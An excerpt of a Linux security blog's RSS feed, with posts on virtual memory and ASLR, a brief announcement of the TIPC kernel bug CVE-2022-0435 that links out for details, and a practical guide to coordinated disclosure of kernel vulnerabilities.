<p>It&rsquo;s worth noting that when a process is created, it is done via <code>fork()</code>, which creates a new process by duplicating the calling process. However, <code>execve()</code> will create a new and empty virtual address space for the application at <code>pathname</code>.</p>
<hr>
<ol>
<li>A deep dive on syscalls is out of scope for this talk, but I might touch on it down the line. In the meantime, <code>man</code> pages are your friend, try <code>man syscalls</code> :)  </li>
<li>Honestly, without digging some more not 100% sure what these are being used for, though likely for something by the shared libs - exercise for the reader? :P</li>
<li>Surprise, surprise this is from <code>man 2 execve</code>!</li>
</ol>
<h3 id="threads">Threads</h3>
<p>So, we&rsquo;ve talked a lot about how are usermode processes live in happy isolation within the sandboxed virtual address spaces. Is this <em><strong>always</strong></em> the case? Nope, and one reason is threads.</p>
<p>Threads are essentially light-weight processes and represent a flow of execution within an application. The reason they&rsquo;re &ldquo;light-weight processes&rdquo; is that when threads are created, instead of using <code>fork()</code> they use a similar system call, <code>clone()</code>.</p>
<p><code>clone()</code> is also used to create a process, but allows more control over what resources are shared between the caller and callee. As a result, in Linux, threads <em><strong>share</strong></em> the same virtual address space and mappings but have separate heap &amp; stack mappings.</p>
<h3 id="aslr">ASLR</h3>
<p>Some of you eager enough to run these commands multiple times may have noticed that the addresses for your mappings change each time you run <code>cat</code>, what gives?</p>
<p><img src="https://sam4k.com/content/images/2022/03/confused_girl.gif" alt=""></p>
<p>Without deviating too off-topic, this is actually normal! It&rsquo;d be more concerning if nothing changed, as this is the result of a mitigation called ASLR: Address Space Layout Randomisation [1].</p>
<p>ASLR does exactly what it says on the tin, randomising by default the virtual addresses that the stack, heap and shared libraries are mapped to each time the program is run. This helps mitigate exploitation techniques that rely on knowing where stuff is in memory!</p>
<p>Modern compilers are also able to compile code as &ldquo;position independent&rdquo; [2], which tl;dr means we can also randomise the virtual address of the executable code as well! Pretty neat :)</p>
<p>Of course, I&rsquo;d be remiss if I didn&rsquo;t mention there&rsquo;s a procfs file to check whether ASLR is currently enabled: <code>cat /proc/sys/kernel/randomize_va_space</code> [3]</p>
<hr>
<ol>
<li><a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization">https://en.wikipedia.org/wiki/Address_space_layout_randomization</a></li>
<li><a href="https://en.wikipedia.org/wiki/Position-independent_code#:~:text=In%20computing,%20position-independent%20code,regardless%20of%20its%20absolute%20address">https://en.wikipedia.org/wiki/Position-independent_code</a></li>
<li><a href="https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/">https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/</a></li>
</ol>
<h3 id="wrapping-up-in-uvas">Wrapping Up In UVAS</h3>
<p><img src="https://sam4k.com/content/images/2022/03/we_did_it.gif" alt=""></p>
<p>And there we have it! Hopefully this has provided a high level overview of the user virtual address space, we&rsquo;ve covered:</p>
<ul>
<li>That the virtual address space is split up into two sections, the lower half being the unprivileged user virtual address space (UVAS)</li>
<li>Userspace is limited in what it can do, but can ask the kernel to perform privileged actions on its behalf via the system call interface</li>
<li>We looked at what a typical application, <code>cat</code>, uses the UVAS for: loading and mapping the code and data into memory, allocating memory for the heap and stack as well as mapping in library files such as libc and locale information</li>
<li>Next we took a brief look at the system calls that userspace applications can use to get the kernel to setup their virtual address space</li>
</ul>
<h2 id="next-time">Next Time!</h2>
<p>Can you believe I planned to wrap everything up in this post? Of course I did, whoops! Suffice to say, we still have a lot to cover in an indeterminate number of posts!</p>
<p>Coming up we&rsquo;ll context switch and take a closer look at what goes in in the kernel virtual address space and how it&rsquo;s mapped. After that, we&rsquo;ll get technical as we figure out how all this is implemented via the kernel and hardware features.</p>
<p>Thanks for reading!</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel</title><description>Recently I discovered a vulnerability in the Linux kernel that&amp;#39;s been lurking there since 4.8 (July 2016)! CVE-2022-0435 is a remotely and locally exploitable stack overflow in the TIPC networking module of the Linux kernel</description><link>https://sam4k.com/cve-2022-0435-a-remote-stack-overflow-in-the-linux-kernel/</link><guid isPermaLink="false">620c2d361b5b6d052837b0c7</guid><category>linux</category><category>kernel</category><category>xdev</category><dc:creator>sam4k</dc:creator><pubDate>Tue, 15 Feb 2022 23:00:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/02/what.gif" medium="image"/><content:encoded><![CDATA[<p>My last post, a <a href="https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/">guide on disclosing Linux kernel vulns</a>, might have been a bit of a giveaway, but recently I discovered a vulnerability in the Linux kernel that&rsquo;s been lurking there since 4.8 (July 2016)!</p>
<p>Now that the embargo is up, I can share it with the world! <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0435">CVE-2022-0435</a> is a remotely and locally exploitable stack overflow in the TIPC networking module of the Linux kernel (don&rsquo;t worry, if you haven&rsquo;t heard of TIPC, it probably isn&rsquo;t loaded by default on your distro).</p>
<h2 id="find-out-more">Find Out More</h2>
<p>If you want a <strong>brief technical overview</strong> of the vulnerability, check out the advisory I posted to the oss-security mailing list:</p>
<p><a href="https://seclists.org/oss-sec/2022/q1/130">oss-sec: CVE-2022-0435: Remote Stack Overflow in Linux Kernel TIPC Module since 4.8 (net/tipc)</a></p>
<p>For a more <strong>detailed analysis</strong> of the vulnerability, covering the same content as the advisory, check out my blog post over on the Immunity blog:</p>
<p><a href="https://web.archive.org/web/20240330111237/https://blog.immunityinc.com/p/a-remote-stack-overflow-in-the-linux-kernel/">CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel</a></p>
<p>Focusing more on exploitation, I discuss the work and techniques involved in writing a contemporary remote kernel exploit, using CVE-2022-0435 as a case-study:</p>
<p><a href="https://web.archive.org/web/20240330065352/https://blog.immunityinc.com/p/writing-a-linux-kernel-remote-in-2022/">Writing a Linux Kernel Remote in 2022</a></p>
<h2 id="get-in-touch">Get in Touch!</h2>
<p>General reminder that if you have any questions / corrections / suggestions / request for content, regarding CVE-2022-0435 or any of my Linuxy security-y stuff, feel free to @ me on <a href="https://twitter.com/sam4k1">Twitter</a>!</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>A Dummy's Guide to Disclosing Linux Kernel Vulnerabilities</title><description>A post sharing some insights into the process behind responsibly disclosing vulnerabilities in the Linux kernel...</description><link>https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/</link><guid isPermaLink="false">61fae6ff7742d008b38dceb4</guid><category>linux</category><category>kernel</category><category>vr</category><dc:creator>sam4k</dc:creator><pubDate>Sat, 05 Feb 2022 19:58:40 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/02/confused_larry.gif" medium="image"/><content:encoded><![CDATA[<p>Bit of a niche one today, but my hope is that at least one person will be able to avoid some of the hurdles I had to tackle and the rest will at least get an interesting insight into the process behind responsibly disclosing vulnerabilities in the Linux kernel.</p>
<p>For context, I recently started my new position as a Sr. Security Researcher and during some of my research I discovered a fairly serious looking vulnerability in a part of the Linux kernel - pretty exciting right?! After <del>double</del> <del>triple</del> quadruple checking what I thought I found was, in fact, what I thought I found (and a couple of fist pumps later) - I asked my boss: what do now???</p>
<p>And that brings you all up to speed, as the post below is the culmination of my various Googlings, sifting through docs, advice from community members and maintainers and array of gotchas encountered all in the pursuit of answering the question: what do now?!</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#some-more-important-context">Some More (Important) Context</a></li>
<li><a href="#initial-preparation">Initial Preparation</a></li>
<li><a href="#the-disclosure-process">The Disclosure Process</a>
<ul>
<li><a href="#0x00-an-overview">0x00 An Overview</a></li>
<li><a href="#0x01-first-contact">0x01 First Contact</a></li>
<li><a href="#0x02-patching-follow-up">0x02 Patching &amp; Follow Up</a>
<ul>
<li><a href="#including-a-patch">Including a Patch</a></li>
</ul>
</li>
<li><a href="#0x03-public-disclosure">0x03 Public Disclosure</a></li>
</ul>
</li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
<h2 id="some-more-important-context">Some More (Important) Context</h2>
<p>Before we dive into the process proper, it&rsquo;s worth highlighting some important context and disclaimers around the nature of this post:</p>
<ol>
<li>First and foremost, this is advice <strong>based on my personal experience</strong> and that of the community members I interacted with. One thing worth knowing is that the open-source community is not a hive mind, so opinions will differ![1]</li>
<li>On the topic of personal experience, this is written from the <strong>perspective of a zoomer</strong> who was born in 1997 and who&rsquo;s prior experience with email was limited to using Gmail for Steam 2FA</li>
<li>Finally, there are <strong>different routes for reporting/disclosing</strong> based on the nature of the bug. In this case I&rsquo;m specifically referring to <strong>unpatched</strong> vulnerabilities within the Linux kernel; where in this instance by vulnerability, I am referring to a &ldquo;<strong>sensitive bug</strong>&rdquo; that could lead to privilege escalations, facilitate PE (KASLR/canary leaks), remote DoS etc.</li>
</ol>
<hr>
<ol>
<li>That being said, I hope the majority of the content of this post has some objective value (otherwise RIP my Saturday morning spent on this)</li>
</ol>
<h2 id="initial-preparation">Initial Preparation</h2>
<p><img src="https://sam4k.com/content/images/2022/02/confident_in_prep.gif" alt=""></p>
<p>Okay, now that we&rsquo;ve laid the groundwork and set some context - let&rsquo;s get stuck into how we&rsquo;re gonna go about disclosing this crazy kernel vuln we&rsquo;ve just found! Well, after we make sure we&rsquo;re ready to disclose this crazy kernel vuln &hellip; it is a crazy kernel vuln right?[1]</p>
<p>The more information and understanding you go into the disclosure process with and are able to share, the easier the job is for everyone involved.</p>
<p>Understandably, you don&rsquo;t want to spend years sat on an 0day to the point you&rsquo;re able to rewrite the whole subsystem blindfolded, but consider the following:</p>
<ul>
<li>What is the impact of the vulnerability? Does it lead to privilege escalation? Is it remotely reachable? Is it trivial or difficult to exploit?</li>
<li>What kernel versions are affected? What commit was the vulnerability introduced in?</li>
<li>What part of the kernel is affected? Is it in the core kernel, a networking module?</li>
<li>Is this vulnerability reachable in most configurations, or only in specific environments/use cases? What distributions are affected?</li>
<li>How would you fix the vulnerability? Are there existing mitigations?</li>
</ul>
<hr>
<ol>
<li>If you find yourself in this position and doubting yourself, it&rsquo;s okay, me too :) In fact it wasn&rsquo;t until my CVE was assigned that I thought &ldquo;Huh, it is legit after all&rdquo;; best solution is harness this doubt into thorough testing, research and notes to prove yourself right (or wrong about being wrong?)</li>
</ol>
<h2 id="the-disclosure-process">The Disclosure Process</h2>
<p>It&rsquo;s time. We&rsquo;ve put in the work, verified our findings and got a solid understanding of the vulnerability&hellip; so, uh, who do we tell? Good question!</p>
<blockquote>
<p><strong>coordinated vulnerability disclosure</strong>, or &ldquo;CVD&rdquo; (formerly known as responsible disclosure)<a href="https://en.wikipedia.org/wiki/Coordinated_vulnerability_disclosure#cite_note-:0-1">[1]</a> is a <a href="https://en.wikipedia.org/wiki/Vulnerability_disclosure">vulnerability disclosure</a> model in which a vulnerability or an issue is disclosed to the public only after the responsible parties have been allowed sufficient time to <a href="https://en.wikipedia.org/wiki/Patch_(computing)">patch</a> or remedy the vulnerability or issue. — Wikipedia</p>
</blockquote>
<p>CVD for the Linux kernel is handled, in typical Linux fashion, over <a href="https://en.wikipedia.org/wiki/Mailing_list#:~:text=A%20mailing%20list%20is%20a,or%20simply%20%22the%20list%22.">mailing lists</a>. There&rsquo;s a few different mailing lists out there, but in particular we&rsquo;re interested in the following:</p>
<ul>
<li><a href="https://www.kernel.org/doc/html/v5.16/admin-guide/security-bugs.html"></a><a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">security@kernel.org</a>[1]: private list for Linux kernel security team, who will help verify the bug &amp; facilitate a fix as part of the <strong>initial embargoed disclosure</strong></li>
<li><a href="https://oss-security.openwall.org/wiki/mailing-lists/distros">linux-distros@vs.openwall.org</a>: private list of security contacts for various Linux distributions, used as a channel to notify distributions of &ldquo;non-public medium or high severity security issues&rdquo; as part of the <strong>initial embargoed disclosure</strong></li>
<li><a href="https://oss-security.openwall.org/wiki/mailing-lists/oss-security">oss-security@lists.openwall.com</a>:  public list which anyone can subscribe to, for &ldquo;public discussion of security flaws, concepts, and practices in the Open Source community&rdquo; and used for <strong>public disclosure</strong> of security vulns</li>
</ul>
<hr>
<ol>
<li>It&rsquo;s worth noting when Googling terms such as &ldquo;linux vulnerability disclosure&rdquo; the top kernel doc result is actually for v4.10 and contains less information than the latest versions; can be fixed by adjusting the URL or going <a href="https://www.kernel.org/doc/html/v5.17-rc2/admin-guide/security-bugs.html"></a><a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">here</a></li>
</ol>
<h3 id="0x00-an-overview">0x00 An Overview</h3>
<p>Before diving into the specifics, below is a quick summary of what the disclosure process will typically look like:</p>
<ol>
<li>Notify <strong><a href="mailto:security@kernel.org">security@kernel.org</a></strong>, <strong><a href="mailto:linux-distros@vs.openwall.org">linux-distros@vs.openwall.org</a></strong> and relevant maintainers of the vulnerability; establishing details, embargo period, CVE request and possible fix</li>
<li>Discussion ensues and ideally a fix is settled on and the affected parties/distributions are kept in the loop</li>
<li>At the end of the embargo period the patch is committed upstream, <strong><a href="mailto:oss-security@lists.openwall.com">oss-security@lists.openwall.com</a></strong> is notified, CVE descriptions are made public, tweets are made etc.</li>
<li>If proof-of-concept code is to be published, this is ideally done several days after to give people time to patch their kernels / apply updates</li>
</ol>
<h3 id="0x01-first-contact">0x01 First Contact</h3>
<p><img src="https://sam4k.com/content/images/2022/02/imready.gif" alt=""></p>
<p>Alright, finally! We&rsquo;ve got all the details covered, now we just need to send an email to <a href="https://www.kernel.org/doc/html/v5.16/admin-guide/security-bugs.html"></a><a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">security@kernel.org</a> and <a href="https://oss-security.openwall.org/wiki/mailing-lists/distros">linux-distros@vs.openwall.org</a> right? WRONG!</p>
<p>Well, technically right, but there&rsquo;s a few crucial details we need to make sure of first, unless you want to stumble your way onto the scene like yours truly.</p>
<p>I&rsquo;ve linked each of the relevant emails to their respective pages, which outline mailing list usage and any requirements. There&rsquo;s a lot of information and sometimes it&rsquo;s conflicting, as &ldquo;linux kernel vuln&rdquo; disclosure is only a subset of what these lists are used for.</p>
<p>❗</p>
<p>Going forward I may refer to the lists by shorthand as <a href="mailto:s@k.o">s@k.o</a> and linux-distros.</p>
<p>So to cut short a long and embarrassing saga of trial and error on my part, here&rsquo;s a distilled collection of the relevant requirements and advice learned:</p>
<ul>
<li>Initial disclosure should be sent to linux-distros, CC&rsquo;ing <a href="mailto:s@k.o">s@k.o</a> along with any relevant subsystem maintainers<a href="https://www.kernel.org/doc/html/latest/process/maintainers.html">[1]</a></li>
<li>The email should be sent in <strong>plaintext</strong>; referring here to the email type and not just the fact it&rsquo;s <strong>not encrypted</strong> (e.g. as opposed to RTF emails with fancy HTML and stuff)</li>
<li>The subject should be prefixed with <code>[vs]</code> to avoid linux-distro&rsquo;s spam filter, and the subject shouldn&rsquo;t contain any sensitive information RE the vulnerability</li>
<li>Propose a <em><strong>tentative</strong></em> public disclosure date &amp; time (e.g. 05/02/22 16:00GMT), while ideally a date should be settled on after a fix is decided, note the maximum embargo period for linux-distros is 14 days regardless of a working fix</li>
<li>Include a request for a CVE to be assigned for the vulnerability</li>
<li>As mentioned, provide as much information and detail as necessary (no War &amp; Peace tho); if you have a fix, see the next section on how to format/include that correctly</li>
</ul>
<p>With all that in hand, you should be ready to make first contact and begin the coordinated disclosure of your Linux kernel vulnerability, awesome!</p>
<p><em>I was about to write my own War &amp; Peace on mail clients, but suffice to say the kernel docs provide some helpful information on recommended email clients and any necessary configuration required to get them to play nice.<a href="https://www.kernel.org/doc/html/latest/process/email-clients.html">[2]</a></em></p>
<hr>
<ol>
<li><a href="https://www.kernel.org/doc/html/latest/process/maintainers.html">https://www.kernel.org/doc/html/latest/process/maintainers.html</a></li>
<li><a href="https://www.kernel.org/doc/html/latest/process/email-clients.html">https://www.kernel.org/doc/html/latest/process/email-clients.html</a></li>
</ol>
<h3 id="0x02-patching-follow-up">0x02 Patching &amp; Follow Up</h3>
<p><img src="https://sam4k.com/content/images/2022/02/waiting.gif" alt=""></p>
<p>Did I CC the right maintainers?! Did my tabs come through on my patch?? Is this even the right mailing list???? - don&rsquo;t sweat it, the waiting game can be real.</p>
<p>If you don&rsquo;t hear back <strong>within 48 hours</strong> then make sure to follow up the initial email to confirm that it was received, as sometimes things can get lost in the mix.</p>
<p>The discussion that ensues will vary based on the amount of information initially supplied, but will likely focus around impact, mitigations and sorting out a fix.</p>
<h4 id="including-a-patch">Including a Patch</h4>
<p>&ldquo;<a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">Submitting patches: the essential guide to getting your code into the kernel</a>&rdquo; is going to be your best friend here, covering almost everything you need to know.</p>
<p>The only difference is you&rsquo;ll just be including this inline within your disclosure email thread with <a href="mailto:s@k.o">s@k.o</a> and linux-distros; as opposed to a separate submission.</p>
<p>This is where the whole email client whitespace mangling comes in to play, as the Linux kernel uses tabs for indentation and these should really be preserved in patch diffs.</p>
<p>Also, I&rsquo;m sure it goes without saying, but make sure you test any patches you submit and make this clear when you suggest a patch!</p>
<h3 id="0x03-public-disclosure">0x03 Public Disclosure</h3>
<p><img src="https://sam4k.com/content/images/2022/02/no_autographs.gif" alt=""></p>
<p>The finishing line is in site now, you can almost see the retweets, as the embargo period comes to an end. There&rsquo;s not much to cover here, so I&rsquo;ll keep it brief:</p>
<ul>
<li>Hopefully a patch has been finalised and the upstream fix can now be disclosed</li>
<li>You can request linux-distros to make the CVE details public</li>
<li>You should send an advisory out to <a href="https://oss-security.openwall.org/wiki/mailing-lists/oss-security">oss-security@lists.openwall.com</a>; see their wiki for more info, but content will be similar to your initial report to linux-distros[1]</li>
<li>If you plan to publish exploit code, mention this in the initial public advisory, but ideally wait several days for users to update their systems</li>
</ul>
<p>And that&rsquo;s it! It&rsquo;s over! Now you can go back to the easy part and find some more vulns!</p>
<hr>
<ol>
<li>Here are some examples of public advisories from <a href="https://seclists.org/oss-sec/2022/q1/80">Qualys</a> &amp; <a href="https://seclists.org/oss-sec/2022/q1/99">grsec</a></li>
</ol>
<h2 id="wrapping-up">Wrapping Up</h2>
<p>Hopefully this post has given some insight into a particularly niche subset of coordinated disclosure practice and can provide some help to people who find themselves into a similar position as I did recently!</p>
<p>Admittedly, the process was rather daunting to go into with the self-imposed pressure of wanting to disclose a new vulnerability, complete inexperience with mailing lists and figuring out the relevant processes and requirements which applied to my situation.</p>
<p>That said, it was also extremely rewarding to be able to contribute back to the Linux community and be able to facilitate a fix for something like this. There may have been more than a little bit of fan-boying while interacting with people I&rsquo;ve followed for a long time, even if they were schooling me on mailing list 101s.</p>
<p>Despite fumbling my way through the process, everyone was helpful and patient, though maybe with this post you can avoid some of the same fumbling.</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Linternals: Introducing Virtual Memory</title><description>Alright, let&amp;#39;s get stuck into some Linternals! As the title suggests, this post will be exploring the ins and outs of virtual memory with regards to modern Linux systems.</description><link>https://sam4k.com/linternals-virtual-memory-part-1/</link><guid isPermaLink="false">61cdb1b7484d4d42c8e4a675</guid><category>linux</category><category>kernel</category><category>memory</category><dc:creator>sam4k</dc:creator><pubDate>Sat, 15 Jan 2022 21:00:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/01/linternals.gif" medium="image"/><content:encoded><![CDATA[<p>Alright, let&rsquo;s get stuck into some Linternals! As the title suggests, this post will be exploring the ins and outs of virtual memory with regards to modern Linux systems.</p>
<p>I say Linux systems, but this topic, like many in this series, treads the line between examining the Linux kernel and the hardware it runs on, but who cares, it&rsquo;s still interesting right? And I guess it is one of the fundamental building blocks of modern systems too&hellip;</p>
<p>That said, I&rsquo;ll try abstract away from getting too stuck into the knitty gritty of hardware specifics where possible (no promises though!), so forgive any gross over simplifications for what can be a deceptively complex topic.  </p>
<p>In this part I&rsquo;ll lay the groundwork by covering some fundamentals such as the differences between physical and virtual memory, the virtual address space and how user-mode and the kernel interact with it this virtual address space.</p>
<p>In a later part (or parts, given my track record), we&rsquo;ll dive a bit deeper and look into how this is implemented and the ways we can really take advantage of virtual memory.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#0x01-what-is-virtual-memory">0x01 What IS Virtual Memory?</a>
<ul>
<li><a href="#physical-memory">Physical Memory</a></li>
<li><a href="#queue-virtual-memory">Queue Virtual Memory</a></li>
</ul>
</li>
<li><a href="#0x02-the-virtual-address-space">0x02 The Virtual Address Space</a>
<ul>
<li><a href="#lets-touch-on-addressing-hexadecimal">Let&rsquo;s Touch on Addressing &amp; Hexadecimal</a></li>
<li><a href="#thats-a-big-vas">That&rsquo;s a Big VAS</a></li>
<li><a href="#vas-overview">VAS Overview</a>
<ul>
<li>Advantages of Virtual Memory</li>
</ul>
</li>
</ul>
</li>
<li><a href="#0x03-the-vm-split">0x03 The VM Split</a>
<ul>
<li><a href="#about-processes">About Processes</a></li>
<li><a href="#user-mode-kernel-mode">User-mode &amp; Kernel-mode</a></li>
<li><a href="#queue-the-vm-split">Queue The VM Split!</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<h2 id="0x01-what-is-virtual-memory">0x01 What IS Virtual Memory?</h2>
<p>Virtual memory, every compsci student knows what virtual memory is right, it&rsquo;s uh, virtual memory, you know, memory that&rsquo;s not physical? Yeah, I&rsquo;m realising it can be a bit fiddly to describe virtual memory in a succinct and intuitive way.</p>
<p><img src="https://sam4k.com/content/images/2022/01/areyouready.gif" alt=""></p>
<h3 id="physical-memory">Physical Memory</h3>
<p>Let&rsquo;s start with what virtual memory <em><strong>ISN&rsquo;Tish</strong></em>, and that&rsquo;s physical! The term &ldquo;physical memory&rdquo; typically refers to your system&rsquo;s RAM (random-access memory). This is the volatile memory your operating system uses for all things transient.</p>
<p>While having your memory cleared when your system is powered-off[1] may seem inconvenient, RAM&rsquo;s speed makes it ideal for use-cases where volatility doesn&rsquo;t matter.</p>
<p>Keeping this brief, there&rsquo;s actually a lot of use-cases for RAM. Like, a lot. The software you&rsquo;re using to view this post? Loaded into and running in RAM. The operating system running that software? Loaded into and running in RAM.</p>
<p>Often we say how a program is &ldquo;loaded into memory&rdquo; and yes, you guessed it, this ubiquitous &ldquo;memory&rdquo; and RAM AKA physical memory are all one-and-the-same. We use non-volatile storage such as SSDs and HDDs to store our kernel, binaries, configs and stuff and then when we need to use them, they&rsquo;re loaded into the much faster RAM for use.</p>
<p>You may also hear RAM referred to as primary memory and SSDs &amp; HDDs as secondary memory.</p>
<ol>
<li>Unless&hellip; <a href="http://citpsite.s3-website-us-east-1.amazonaws.com/oldsite-htdocs/pub/coldboot.pdf">here&rsquo;s a paper</a> from 2008 USENIX Security Composium about recovering data from RAM</li>
</ol>
<h3 id="queue-virtual-memory">Queue Virtual Memory</h3>
<p>Okay, so now we have a general grasp of physical memory and the integral role it plays, it&rsquo;s time to introduce the titular virtual memory!</p>
<p>As we alluded to above, basically everything wants a piece of RAM. Using <code>ps</code> we can see just how many processes are vying for a slice of our precious RAM:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ ps -e --no-headers | wc -l
</span></span><span class="line"><span class="cl">404
</span></span></code></pre></div><p>And if anyone has ever looked into building or upgrading a PC, they&rsquo;ll know that GB for GB, RAM is a lot more expensive than it&rsquo;s non-volatile counterparts.</p>
<p><img src="https://sam4k.com/content/images/2022/01/needmoremem-1.gif" alt=""></p>
<p>Not to mention, as the &ldquo;random-access&rdquo; implies, systems are able to access any memory location in physical memory directly, meaning things can get chaotic real fast if every process is trying to find and manage which bits of memory are up for grabs.</p>
<p>Queue virtual memory: a means to abstract processes away from the low level organisation of physical memory (this burden is passed to the kernel) by providing a Virtual Address Space.</p>
<h2 id="0x02-the-virtual-address-space">0x02 The Virtual Address Space</h2>
<p>Sweet, so the Virtual Address Space (VAS) provides a physical memory abstraction for processes to use by shifting the burden of managing low level organisation to the kernel! Cool cool &hellip; so, uh, how exactly?</p>
<p>Instead of having processes (and by extension their programmers) deal with accessing and managing physical memory directly, using virtual memory provides <strong>each process with it&rsquo;s own</strong> virtual address space.</p>
<p>This virtual address space represents the range of all <strong>addressable physical memory</strong>. Let&rsquo;s unpack that for a second. Not all free RAM, or even all the RAM you have installed in your computer, but all the possible physical memory your computer <strong>could</strong> address if it had it.</p>
<p>Modern 64-bit systems can handle 64 bits of data at a time. This means on typical 64-bit architectures, like Intel&rsquo;s x86_64 and aarch64, pointers to memory can be 64-bits long. So, theoretically speaking, we can have up to 264 different addresses[1].</p>
<p>This means our virtual address space on a 64-bit system ranges from <code>0x0 - 0xffffffffffffffff</code>. That&rsquo;s a lot of bytes!</p>
<ol>
<li>For anyone wondering on this value, a &ldquo;bit&rdquo; is a binary value, it can be a 0 or 1. So 64 of them can represent a combination of 264 different values</li>
</ol>
<h3 id="lets-touch-on-addressing-hexadecimal">Let&rsquo;s Touch on Addressing &amp; Hexadecimal</h3>
<p>Some of you will notice that I wrote the address in hexadecimal (hex), which is a base 16 number system; tl;dr being the numbers go up to 16 instead 10 before becoming 2 digits.</p>
<p>We use hexadecimal over decimal because as a base 16 system, it lines up perfectly with the binary (base 2) system that forms the fundamental of computing architecture and as a result all manner of digital data representation.</p>
<p>The reason hexadecimal &ldquo;lines up perfectly&rdquo; is that 16 is a power 2; 24 specifically, which basically means that 1 hex digit can perfectly represent any 4 binary digits. 2 hex for 8 binary and so on. Whereas decimal simply doesn&rsquo;t align like this.</p>
<p><img src="https://sam4k.com/content/images/2022/01/mathematical.gif" alt=""></p>
<p>So for things like memory, which is often byte-addressable, hexadecimal provides as a more readable and information dense alternative to using binary.</p>
<h3 id="thats-a-big-vas">That&rsquo;s a Big VAS</h3>
<p>Back to the VAS, some of you might have clocked that <code>0xffffffffffffffff</code> is an awful lot of bytes, right? Yep, unless you have 264 bytes AKA ~18 Exabytes AKA 18874368 Terabytes, then we&rsquo;re clearly addressing far more memory we have on our primary and secondary memory combined! And for each process?! What gives?</p>
<p>First and foremost, remember, this is a <strong>virtual</strong> address space provided to processes. The reality is the majority of this address space will go unused. For virtual memory to actually be used, and take up space, the virtual address has to be mapped to some physical address.</p>
<p>Mapped?? For virtual memory to be used by a process it first needs to be <strong>mapped</strong> to a physical address, where the data actually resides. It&rsquo;s the kernels job to handle this and manage the book keeping for memory management.</p>
<p>At one point or another, the virtual memory address needs to be translated to the physical address where the data is actually located, this process is called address translation.You bet we&rsquo;ll be looking into that some more later!</p>
<p>But let&rsquo;s use this moment to remind ourselves that <em><strong>each process has it&rsquo;s own virtual address space</strong></em>. So effectively, each process lives in a sandbox, believing it has unfettered access to addresses <code>0x0 - 0xffffffffffffffff</code>. Processes are not aware/able to access the virtual address space of another process.</p>
<p><img src="https://sam4k.com/content/images/2022/01/addresstrans_basic-3.png" alt=""></p>
<p>Drastically over simplified view of how two processes can use the same virtual address which however translates to a different physical address. </p>
<p>So this means that process 1 &amp; process 2 could make use of the same virtual address in their respective virtual address space, however these would both be translated by the kernel to two DIFFERENT physical addresses. Still following?</p>
<h3 id="vas-overview">VAS Overview</h3>
<p>So to summarise what we&rsquo;ve learned so far: each process running on a Linux system has it&rsquo;s own virtual address space. This VAS can span the entire addressable space for that architecture, however virtual addresses are only used after they have been mapped by the kernel to a physical address i.e they are actually taking up some space in physical memory.</p>
<p>It&rsquo;s the kernels role to do all the bookkeeping and lower-level memory organisation around translating this virtual address to the actual physical address1.</p>
<p>This way, processes and their programmers don&rsquo;t need to concern themselves with any low-level memory organisation or even worry about other processes, they just have to interact with this broad VAS and the kernel will handle the rest.</p>
<h4 id="advantages-of-virtual-memory">Advantages of Virtual Memory</h4>
<p>Given the above, one of the most obvious advantages of virtual memory is that it takes a lot of the burden off of programmers with regards to memory management.</p>
<p>However, as we&rsquo;ll touch on more later, using a virtual memory scheme affords us several other important advantages as well:</p>
<ul>
<li>It allows the kernel, behind the scenes, to actual map virtual addresses to <strong>secondary memory</strong> (SSDs &amp; HDDs). This allows us to map less used/important2 data to the slower secondary memory and free up our scarce RAM for data that needs it.</li>
<li>The address translation process and abstraction of physical memory allows us to implement additional features, notably security related ones, to our memory management</li>
</ul>
<ol>
<li>I say &ldquo;around translating&rdquo; as technically the actual address translation is done at a lower level, by the CPU</li>
<li>Another gross simplification, we might touch later on the metrics behind these decisions</li>
</ol>
<h2 id="0x03-the-vm-split">0x03 The VM Split</h2>
<p>Okay, let&rsquo;s explore a little more how the virtual address space is used in Linux, as it&rsquo;s not just a matter of throwing a 18EB address space at a user process and saying have at it!</p>
<h3 id="about-processes">About Processes</h3>
<p>I realised I&rsquo;m throwing around the term process left and right, and while I want to remain focused on the topic at hand, I&rsquo;ll just touch briefly on what a process is in Linux.</p>
<p>Simply, a process is a running instance of a program[1]. Nowadays, programs can get pretty complex and thanks to the advances of programming languages and library support, the burden of reaching these complexity needs are eased.</p>
<p>However, even the most simple &ldquo;Hello, World!&rdquo; program in C requires loading shared libraries which in turn need to interact with the kernel to get things done.</p>
<p>Don&rsquo;t believe me? Take the basic C program below:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">   <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Hello, World!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">   <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>With a few commands, we can get a quick insight into what&rsquo;s going on behind the scenes:</p>
